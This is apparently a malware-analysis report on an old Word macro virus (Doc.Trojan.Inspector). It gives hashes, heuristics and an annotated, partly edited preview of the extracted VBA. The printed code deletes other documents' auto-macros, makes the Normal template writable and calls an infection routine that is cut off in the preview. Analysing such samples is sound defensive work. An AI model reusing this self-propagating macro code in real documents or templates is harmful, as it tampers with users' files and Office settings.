Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 c5b2ff6c6f6c212b…

MALICIOUS

Office (OLE)

47.5 KB Created: 2001-07-04 06:10:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14
MD5: 7951ac99fce9f8a1d75e0457607f1717 SHA-1: 0c2a0925a2b86faba20400d65b834df4f49d89a0 SHA-256: c5b2ff6c6f6c212b9b95e3e97b3ec00599ae91c8f0dab5ca263df27310ea7109
220 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 — Command and Scripting Interpreter: Visual Basic

The sample is a legacy Word document containing VBA macros, flagged by multiple high-severity heuristics including OLE_VBA_AUTOOPEN, OLE_VBA_DOCOPEN, and OLE_VBA_AUTOCLOSE. The extracted VBA module 'VirusInspect' (self-titled "Wu's Macro Virus Inspector") is a macro-virus "cleaner" that behaves as a macro virus itself. On each auto-macro event (AutoExec, AutoExit and AutoOpen are visible in the preview; the flagged Document_Open/Auto_Close handlers fall past the truncation point) it walks every open document and loaded template and deletes auto-execution procedures (AutoOpen, Document_Open, AutoClose, AutoExec, ...) and the MAIN routine of any module named after such an event, sparing only procedures whose first line contains the marker "Wu" — i.e. it removes competing macros while protecting its own. Its Init routine also resets the file attributes of the Normal template via SetAttr(..., 32) (dropping any read-only bit) and then calls InfectTo(Application.NormalTemplate); InfectTo's body is not in the preview, but that call is the replication/persistence step consistent with the ClamAV verdict Doc.Trojan.Inspector. "Interfering with security measures within the document" therefore understates it: the practical risk is modification of the global template and of other open documents' VBA projects (which in current Office additionally requires the 'Trust access to the VBA project object model' setting to be enabled), followed by unattended saves through SafeSave.

Heuristics 6

  • ClamAV: Doc.Trojan.Inspector-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Inspector-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Reviewer note: for this sample the "no modern VBA project was recovered" part is contradicted by the extracted artifact below (macros.bas, 32,929 bytes of decoded VBA with AutoExec/AutoExit/AutoOpen procedures), and ClamAV does supply a family name (Doc.Trojan.Inspector); treat this marker as corroboration of the auto-exec surface, not as a standalone finding.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 32929 bytes
SHA-256: f16ff3eaecfa28d60271c0165e08ffbd59df79a4d9d9ad346b43351dfb6b7113
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "VirusInspect"
Option Explicit

' Module-level state of the "VirusInspect" macro (self-titled "Wu's Macro
' Virus Inspector").  Only names referenced by the visible procedures are
' described; LatestVer, g_VBCom and Logo are not used anywhere in the
' truncated preview.

' Number of procedures deleted so far (incremented in DeleteCode, compared
' in KillVirus, reported and reset in DetectAll, reset in Init).
Dim KillCount As Integer
' Filled by Init with the auto-execution procedure names to hunt
' (Document_Close, Document_Open, AutoClose, AutoOpen, ...).
Dim sAutoNames  As Variant

' Set once Init has run (Init is called from every KillVirus pass).
Dim bInited As Boolean
Dim LatestVer As Double
Dim g_VBCom As Variant
' Names of documents already processed in this run (see SetDetectedFlag);
' emptied by ClearReg.
Dim DetectedList As New Collection
' Not referenced in the preview, but the "Wu" substring is what KillSub
' looks for on a procedure's first line to spare the macro's own code.
Const Logo As String = "Wu's Macro Virus Inspector "



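' Returns the 1-based position of doc.Name in DetectedList, or 0 when the
' document has not been registered yet.  KillVirus treats any non-zero
' result as "already processed in this run" and skips the document.
'
' doc: any object exposing a Name property (Word Document or Template).
'
' Fix: the listing read "Detected List.Item(i)" - the identifier split by a
' space - which cannot compile under Option Explicit; the intended name is
' the module-level DetectedList collection declared above.
Function Detected(doc As Variant) As Integer
Dim i As Integer
Detected = 0
For i = 1 To DetectedList.count
  If (doc.Name = DetectedList.Item(i)) Then
    Detected = i
    Exit Function
  End If
Next
End Function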
' Registers (f = True) or unregisters (f = False) doc.Name in DetectedList.
' Both directions are no-ops when the list is already in the requested
' state, so repeated calls are harmless.
Sub SetDetectedFlag(doc As Variant, ByVal f As Boolean)
Dim pos As Integer
pos = Detected(doc)
If f Then
    ' register only once per document name
    If pos < 1 Then DetectedList.Add (doc.Name)
ElseIf pos > 0 Then
    DetectedList.Remove (pos)
End If
End Sub
' Empties DetectedList so every document becomes eligible for another scan.
Sub ClearReg()
Do Until DetectedList.count = 0
    DetectedList.Remove 1
Loop
End Sub



' Deletes n lines starting at line st from code module cm and bumps the
' module-wide KillCount.  The status text reports st + n, which is one past
' the last line actually removed (st + n - 1); kept verbatim because the
' string is part of the sample's observable behaviour.
' cm: a VBIDE CodeModule (passed as Variant); st: first line to delete.
Sub DeleteCode(cm As Variant, ByVal st, n As Long)
Dim msg As String
KillCount = KillCount + 1
cm.DeleteLines st, n
msg = "Delete From Line " & st & "to " & st + n
ShowStatus (msg)
End Sub
' Removes procedure Name from code module cm unless the procedure's first
' line contains "Wu" (case-insensitive) - the marker the sample puts on its
' own routines ('Wu's Sub) so that they survive the cleanup.  Does nothing
' when Name does not occur in the module text at all, or when any VBIDE
' call raises an error.
' NOTE(review): VBIDE's ProcStartLine may include comment/blank lines that
' immediately precede the Sub statement; if so, the "first line" examined
' here is that preceding line rather than the signature.  The sample's own
' auto-macros are written back-to-back with the tag on the Sub line itself.
Sub KillSub(cm As Variant, ByVal Name As String)
Dim startLine As Long
Dim lineCount As Long
Dim firstLine As String

  ' Cheap text search before touching the procedure API.
  If Not cm.Find(Name, 1, 1, cm.CountOfLines + 1, 1) Then Exit Sub

  On Error GoTo Bail
  startLine = cm.ProcStartLine(Name, 0)  ' 0 = vbext_pk_Proc
  lineCount = cm.ProcCountLines(Name, 0)
  firstLine = cm.Lines(startLine, 1)
  ' Own code is whitelisted by the "Wu" marker; everything else is deleted.
  If InStr(1, firstLine, "Wu", vbTextCompare) < 1 Then
    DeleteCode cm, startLine, lineCount
  End If
Bail:
End Sub
' For a code module whose *name* contains any of the auto-exec names in
' sAutoNames (e.g. a module called "AutoOpen"), deletes its MAIN procedure.
' Presumably this targets the converted-WordBasic layout where a module named
' after the event holds a MAIN sub - inferred from the names, not shown here.
Sub KillAutoMod(md As Variant)
Dim autoName As Variant
For Each autoName In sAutoNames
    If InStr(1, md.Name, autoName, vbTextCompare) > 0 Then KillSub md, "MAIN"
Next autoName
End Sub

Sub KillVirus(doc As Variant) 'Document)
' Scans one Word document/template for auto-execution macros and deletes
' them.  Side effects: calls Init (which touches the Normal template - see
' Init), may rewrite doc's VBA project via DeleteCode, and may save doc
' through SafeSave (not in the visible listing).
' doc: a Word Document or Template - anything with Name, saved and VBProject.
'VBProject
Dim prj As Variant 'VBProject
Dim obj As Variant 'unused in this procedure
Dim Name As Variant
Dim j, n As Integer 'VBA: only n is Integer, j is Variant; n is unused
Dim md As Variant 'CodeModule
Dim VBCom As Variant 'VBComponents
Dim count As Integer
Dim saved As Boolean

Call Init
' Detected returns the 1-based registry index, 0 if unseen; non-zero means
' this document was already handled in the current run.
If (Detected(doc)) Then
     Exit Sub
End If

 saved = doc.saved
 
    count = KillCount
    Set prj = doc.VBProject
    Set VBCom = prj.VBComponents
    ' Pass 1: modules whose name matches an auto-exec name lose their MAIN.
    For j = 1 To VBCom.count
     Set md = VBCom.Item(j).CodeModule
        Call KillAutoMod(md)
    Next j
    ' Pass 2: every module - delete each auto-exec procedure unless its
    ' first line carries the "Wu" marker, then repeat the MAIN check.
    For j = 1 To VBCom.count
    Set md = VBCom.Item(j).CodeModule
        ShowStatus "Scanning In " & md.Name
        For Each Name In sAutoNames
         Call KillSub(md, Name)
        Next Name
        Call KillAutoMod(md)
    Next j
    
    Call SetDetectedFlag(doc, True)
'    prj.VBComponents(1).Activate
    ' Something was deleted: empty the registry (so every document, including
    ' this one, is eligible again) and either save via SafeSave when the
    ' document was clean on entry, or leave it marked dirty.
    If (KillCount > count) Then
        ClearReg
        If (saved) Then
            Call SafeSave(doc)
        Else
         doc.saved = False
        End If
    Else
     ' Nothing deleted: restore the saved flag, presumably so the scan
     ' itself does not leave the document looking modified.
     If (saved) Then
     doc.saved = True
     End If
    End If
 
 End Sub
 
 
 
 
 
' Runs KillVirus over every open document and every loaded template, reports
' the outcome through ShowStatus and resets KillCount for the next run.
' The status strings are Chinese: "Killed <n> viruses! But not saved" and
' "No macro virus found!" - reproduced byte-for-byte.
Sub DetectAll()
Dim target As Variant
For Each target In Documents
    KillVirus target
Next
For Each target In Templates
    KillVirus target
Next
If KillCount > 0 Then
    ShowStatus "杀掉 " & KillCount & "个病毒!但未保存"
Else
    ShowStatus "未发现宏病毒!"
End If
KillCount = 0
End Sub

 
 
 
  
 
Sub Init()
' One-time setup, invoked from every KillVirus call.  Besides filling
' sAutoNames this is where the sample touches the global Normal template:
' it rewrites the template's file attributes and then calls InfectTo on it.
    Dim i As Integer 'unused
    Dim obj As Variant
    
    If (bInited) Then
        Exit Sub
    End If
    'MsgBox "Init"
    ' Auto-execution procedure names that KillSub will delete from other
    ' modules (the macro's own copies are spared via the "Wu" marker).
    sAutoNames = Array("Document_Close", "Document_Open", _
    "AutoClose", "AutoOpen", "Document_New", "AutoExec", _
     "AutoNew", "AutoExit")
    ' 32 = vbArchive.  VBA's SetAttr replaces the whole attribute mask, so a
    ' read-only or hidden Normal template becomes a plain writable file
    ' right before it is modified.
    Call SetAttr(Application.NormalTemplate.FullName, 32) 'vbArchive)
    Set obj = Application.NormalTemplate
    ' InfectTo is not in the truncated preview; by name and by the ClamAV
    ' verdict (Doc.Trojan.Inspector) this is presumably the step that copies
    ' the macro into the Normal template - confirm against the full artifact.
    Call InfectTo(obj)
    KillCount = 0
    ClearReg
    bInited = True
End Sub
Sub AutoExec() 'Wu's Sub
 ' Word start-up auto-macro: triggers the full scan.  The 'Wu's Sub tag on
 ' the Sub line must stay there - KillSub spares a procedure only when the
 ' "Wu" marker is on the procedure's first line.
 DetectAll
End Sub
Sub AutoExit() 'Wu's Sub
 ' Word shut-down auto-macro: triggers the full scan.  The 'Wu's Sub tag on
 ' the Sub line is the self-protection marker checked by KillSub; do not
 ' move it to a line above the signature.
 DetectAll
End Sub
Sub AutoOpen() 'Wu's Sub
 ' Document-open auto-macro (the OLE_VBA_AUTOOPEN hit): triggers the full
 ' scan.  The 'Wu's Sub tag on the Sub line is the self-protection marker
 ' checked by KillSub.
 DetectAll
End Sub
Sub Au
... (truncated)